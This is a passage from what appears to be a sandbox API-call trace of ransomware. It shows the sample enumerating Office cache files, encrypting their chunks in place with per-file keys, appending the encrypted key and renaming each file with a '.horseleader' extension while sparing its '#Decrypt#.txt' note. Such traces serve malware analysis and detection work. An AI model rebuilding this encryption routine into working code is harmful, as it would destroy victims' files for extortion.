(lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0217.236] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0217.236] CloseHandle (hObject=0x1cc) returned 1 [0217.237] GetProcessHeap () returned 0x780000 [0217.237] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a620 | out: hHeap=0x780000) returned 1 [0217.237] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x18179b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18179b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="{91140000-0011-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~1")) returned 1 [0217.237] lstrcmpiW (lpString1="{91140000-0011-0000-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0217.246] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C") returned 66 [0217.247] lstrcmpW (lpString1="{91140000-0011-0000-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0217.247] lstrcmpW (lpString1="{91140000-0011-0000-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0217.247] lstrcmpW (lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0217.247] GetProcessHeap () returned 0x780000 [0217.247] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79a620 [0217.247] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*") returned 68 [0217.247] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x18179b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18179b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0217.372] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0217.372] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\.") returned 68 [0217.372] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0217.372] StrStrIW (lpFirst=".", lpSrch=".horseleader") returned 0x0 [0217.372] lstrcmpW (lpString1=".", lpString2="#Decrypt#.txt") returned 1 [0217.372] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0217.372] lstrlenW (lpString=".testttjffg") returned 11 [0217.373] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\.", lpSrch=".testttjffg") returned 0x0 [0217.373] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0217.373] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0217.373] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0217.373] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x18179b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18179b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0217.374] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0217.374] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\..") returned 69 [0217.374] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0217.374] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0217.374] StrStrIW (lpFirst="..", lpSrch=".horseleader") returned 0x0 [0217.374] lstrcmpW (lpString1="..", lpString2="#Decrypt#.txt") returned 1 [0217.374] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0217.374] lstrlenW (lpString=".testttjffg") returned 11 [0217.374] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\..", lpSrch=".testttjffg") returned 0x0 [0217.374] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0217.374] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0217.374] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0217.374] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x34ae1a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x34ae1a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xfe0c2860, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1e6600, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Office32WW.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0217.374] lstrcmpiW (lpString1="Office32WW.msi", lpString2="Windows") returned -1 [0217.374] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 81 [0217.375] StrStrIW (lpFirst="Office32WW.msi", lpSrch=".horseleader") returned 0x0 [0217.375] lstrcmpW (lpString1="Office32WW.msi", lpString2="#Decrypt#.txt") returned 1 [0217.375] lstrcmpW (lpString1="Office32WW.msi", lpString2="_uninstalling_.png") returned 1 [0217.375] lstrlenW (lpString=".testttjffg") returned 11 [0217.375] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi", lpSrch=".testttjffg") returned 0x0 [0217.375] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0217.375] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0217.375] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0217.376] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 81 [0217.376] StrStrW (lpFirst="Office32WW.msi", lpSrch=".txt") returned 0x0 [0217.376] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=1992192) returned 1 [0217.377] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.377] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0217.414] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0217.414] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0217.415] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xf0b00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.415] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0217.422] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0217.422] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0217.422] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x1e1600, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.422] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0218.742] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0218.742] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0218.742] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0218.742] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0218.743] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0218.743] CloseHandle (hObject=0x21c) returned 1 [0218.743] GetProcessHeap () returned 0x780000 [0218.744] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0218.744] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi.horseleader") returned 93 [0218.744] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi.horseleader")) returned 1 [0218.752] GetProcessHeap () returned 0x780000 [0218.752] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0218.753] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x940c2a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x940c2a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xfe09b760, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x10b2, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Office32WW.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0218.753] lstrcmpiW (lpString1="Office32WW.xml", lpString2="Windows") returned -1 [0218.753] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0218.753] StrStrIW (lpFirst="Office32WW.xml", lpSrch=".horseleader") returned 0x0 [0218.753] lstrcmpW (lpString1="Office32WW.xml", lpString2="#Decrypt#.txt") returned 1 [0218.753] lstrcmpW (lpString1="Office32WW.xml", lpString2="_uninstalling_.png") returned 1 [0218.753] lstrlenW (lpString=".testttjffg") returned 11 [0218.753] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpSrch=".testttjffg") returned 0x0 [0218.753] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0218.753] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0218.753] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0218.754] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0218.754] StrStrW (lpFirst="Office32WW.xml", lpSrch=".txt") returned 0x0 [0218.754] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=4274) returned 1 [0218.754] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x10b2, lpOverlapped=0x0) returned 1 [0218.761] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffef4e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0218.762] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x10b2, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x10b2, lpOverlapped=0x0) returned 1 [0218.782] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.283] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0219.283] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0219.283] CloseHandle (hObject=0x21c) returned 1 [0219.283] GetProcessHeap () returned 0x780000 [0219.283] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0219.284] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.horseleader") returned 93 [0219.284] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml.horseleader")) returned 1 [0219.288] GetProcessHeap () returned 0x780000 [0219.289] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0219.289] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf885a000, ftCreationTime.dwHighDateTime=0x1cac4d7, ftLastAccessTime.dwLowDateTime=0xf885a000, ftLastAccessTime.dwHighDateTime=0x1cac4d7, ftLastWriteTime.dwLowDateTime=0x17c42c30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x2a968, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="ose.exe", cAlternateFileName="")) returned 1 [0219.289] lstrcmpiW (lpString1="ose.exe", lpString2="Windows") returned -1 [0219.289] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 74 [0219.289] StrStrIW (lpFirst="ose.exe", lpSrch=".horseleader") returned 0x0 [0219.289] lstrcmpW (lpString1="ose.exe", lpString2="#Decrypt#.txt") returned 1 [0219.289] lstrcmpW (lpString1="ose.exe", lpString2="_uninstalling_.png") returned 1 [0219.289] lstrlenW (lpString=".testttjffg") returned 11 [0219.289] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe", lpSrch=".testttjffg") returned 0x0 [0219.289] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0219.289] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0219.289] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0219.300] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 74 [0219.301] StrStrW (lpFirst="ose.exe", lpSrch=".txt") returned 0x0 [0219.301] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=174440) returned 1 [0219.301] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.301] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.312] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.312] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.313] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x12cb4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.313] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.313] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.314] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.314] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x25968, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.314] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.316] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.316] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.316] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.316] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0219.316] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0219.316] CloseHandle (hObject=0x21c) returned 1 [0219.317] GetProcessHeap () returned 0x780000 [0219.317] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0219.317] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe.horseleader") returned 86 [0219.317] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All 